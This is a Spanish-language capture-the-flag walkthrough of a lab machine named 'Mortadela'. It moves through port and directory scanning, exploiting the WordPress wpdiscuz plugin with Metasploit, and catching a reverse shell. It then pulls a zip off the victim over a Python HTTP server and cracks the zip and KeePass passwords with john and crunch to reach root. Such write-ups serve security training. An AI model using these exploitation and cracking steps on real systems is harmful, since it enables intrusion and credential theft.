# Mortadela

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.1.68
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FuqHVe2BiTq0LwBjdzgpL%2Fimage.png?alt=media&#x26;token=1008ca8d-76e4-4239-9f98-3a149faee591" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 192.168.1.68
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FQE8yYjOLq5HHO0zbx3Rq%2Fimage.png?alt=media&#x26;token=3101c3fd-fb91-4147-bc8f-52389f5c2ab3" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH,** el **puerto 80** perteneciente al **servicio HTTP** y el **puerto 3306** perteneciente al **servicio MySQL** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80,3306 -v 192.168.1.68
```

para obtener más información sobre ese puerto específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FkXlutBHBFnYn5MJeGbvO%2Fimage.png?alt=media&#x26;token=1a53695a-fb93-4093-8c99-0e7cff8c0278" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora exploramos el servicio **HTTP**. Ingresamos la IP y nos encontramos la página por defecto de **Apache**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHmRwGj5621IUNeGoyoyi%2Fimage.png?alt=media&#x26;token=c37b8515-cec8-469d-8c47-620a298f47e5" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://192.168.1.68/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPk6LrNHnRRI68b4XhTZp%2Fimage.png?alt=media&#x26;token=6d627a66-1465-45b1-b678-eb332f4d2d7a" alt=""><figcaption></figcaption></figure>

Vemos que nos ha encontrado un directorio de **WordPress** por lo que accederemos a él.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F16V2TbBuPFeJSQw5tJuE%2Fimage.png?alt=media&#x26;token=134cf9b8-0615-436d-a191-c456ddd1420c" alt=""><figcaption></figcaption></figure>

Como no encontramos nada relevante vamos a realizar un escaneo de plugins.

```
wpscan --url http://192.168.1.68/wordpress/ --plugins-detection aggressive
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoOP7L6ZWjjxKEScNqAbV%2Fimage.png?alt=media&#x26;token=88eb5a88-5cfa-44b3-a040-7a6162cd7f43" alt=""><figcaption></figcaption></figure>

Se nos muestra un plugin llamado **wpdiscuz** y su versión por lo que a través de **searchsploit** miraremos si esa versión contiene alguna vulnerabilidad para explotar con **Metasploit**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FS0MKJ441nQY5UrZLPE3K%2Fimage.png?alt=media&#x26;token=e6716d10-850b-43da-b7df-95347053ec14" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Comprobamos que sí la hay.

```bash
msfconsole
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F7qnVZBzDFOAGzJ9IPqTZ%2Fimage.png?alt=media&#x26;token=2f8e621e-5158-4202-88c2-40ed32c77cd1" alt=""><figcaption></figcaption></figure>

Buscamos plugin para la vulnerabilidad.

```bash
search wpdiscuz
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoKH0lCLWkYEaCmZatjIF%2Fimage.png?alt=media&#x26;token=89dd5992-aaed-4235-911d-031bf83c825c" alt=""><figcaption></figcaption></figure>

```bash
use 0
show options
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FQJ1xjOTeBM98VGwglNet%2Fimage.png?alt=media&#x26;token=1188e8e7-e2a4-4125-9fcf-32114844a4bb" alt=""><figcaption></figcaption></figure>

Configuramos lo que nos piden.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fs45liJ8lmfEN5FPtpXlf%2Fimage.png?alt=media&#x26;token=a8d0a4b5-66d1-4b4e-b9e9-c8cce90844ce" alt=""><figcaption></figcaption></figure>

Ejecutamos.

```
run
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fae92ajpILDjN97CTTfBK%2Fimage.png?alt=media&#x26;token=bc318c55-16b0-420e-a13c-292680eaaee6" alt=""><figcaption></figcaption></figure>

Ejecutamos una shell pero nos ponemos en escucha a través del puerto 443 para enviarnos una **Reverse Shell**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FbDRHGk7zVpWw0N0EgDrO%2Fimage.png?alt=media&#x26;token=9fc5bfb7-f236-4aaa-acb6-e9b8fd21e413" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FiJ4DBWO0Jp1gZvsPqkZA%2Fimage.png?alt=media&#x26;token=50129d9e-a39d-46ce-88c1-dca00a941231" alt=""><figcaption></figcaption></figure>

Realizamos tratamiento de la TTY. Como se nos muestra aquí: [Tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/).

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar pero no tenemos permisos. Por lo que buscamos SUID.

```bash
find / -perm -4000 -ls 2> /dev/null
```

No hay un binario para escalar privilegios. Por lo que indagamos a través de los directorios y encontramos en el directorio `/opt` un archivo **.zip**. Al descomprimirlo nos pide una contraseña. Nos lo descargamos a nuestra máquina local.

```bash
En la máquina víctima
python3 -m http.server 8080
En la máquina atacante
wget http://192.168.1.68:8080/muyconfidencial.zip
```

Ahora realizamos fuerza bruta.

```bash
zip2john muyconfidencial.zip > hash_zip
```

```bash
john hash_zip --wordlist=/usr/share/wordlists/rockyou.txt 
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FzDqyT36IanfSL7149MJj%2Fimage.png?alt=media&#x26;token=c24e81d4-147d-4457-b412-e90d574abbdc" alt=""><figcaption></figcaption></figure>

Hemos descubierto la contraseña que se nos pide para descomprimir el archivo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHCoZOcCVoznLAsSV09wL%2Fimage.png?alt=media&#x26;token=d83bb428-834e-40a4-8ea8-3ad3f7c39f15" alt=""><figcaption></figcaption></figure>

Utilizamos el siguiente script de Python para extraer contraseñas de un archivo de base de datos de **KeePass**:

<pre class="language-plaintext"><code class="lang-plaintext"><strong>https://github.com/z-jxy/keepass_dump/blob/main/keepass_dump.py
</strong></code></pre>

```bash
python3 keepass.py -f KeePass.DMP
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDrxyNb4vybvgTIhYttjs%2Fimage.png?alt=media&#x26;token=1fae49bb-f72b-4a6b-9e13-7e752e251c35" alt=""><figcaption></figcaption></figure>

Ahora creamos un diccionario con mayúsculas y minúsculas.

```bash
crunch 14 14 ABCDEFGHIJKLMNÑOPQRSTUVWXYZabcdefghijklmnñopqrstuvwxyz -t @aritrini12345 -o diccionario.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fqsl1OVzqLlCfRCmOTe5r%2Fimage.png?alt=media&#x26;token=02d87985-fc15-499e-b83d-cc836cca2db1" alt=""><figcaption></figcaption></figure>

Ahora que contamos con un diccionario, procederemos a extraer el hash del archivo utilizando `keepass2john`. Posteriormente, emplearemos `john` para descubrir la contraseña.

```bash
keepass2john Database.kdbx > hash
```

```bash
john hash --wordlist=diccionario.txt
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FqtS5clw6k9FEKjsF9MWn%2Fimage.png?alt=media&#x26;token=cdfdbe8f-fa59-4dd9-a202-088830206302" alt=""><figcaption></figcaption></figure>

```
keepass2 Database.kdbx
```

Ingresamos la contraseña y vemos que hay un usuario **root**. Copiamos la contraseña e iniciamos sesión.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FwWGzptRrZC80yKKpu9MR%2Fimage.png?alt=media&#x26;token=7798f93c-8159-4ae4-98ef-b385973ed0a2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDuwtVcO6LfPKYqhDaFkB%2Fimage.png?alt=media&#x26;token=d8d77c42-da62-4b51-abb4-36fdf1918552" alt=""><figcaption></figcaption></figure>

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
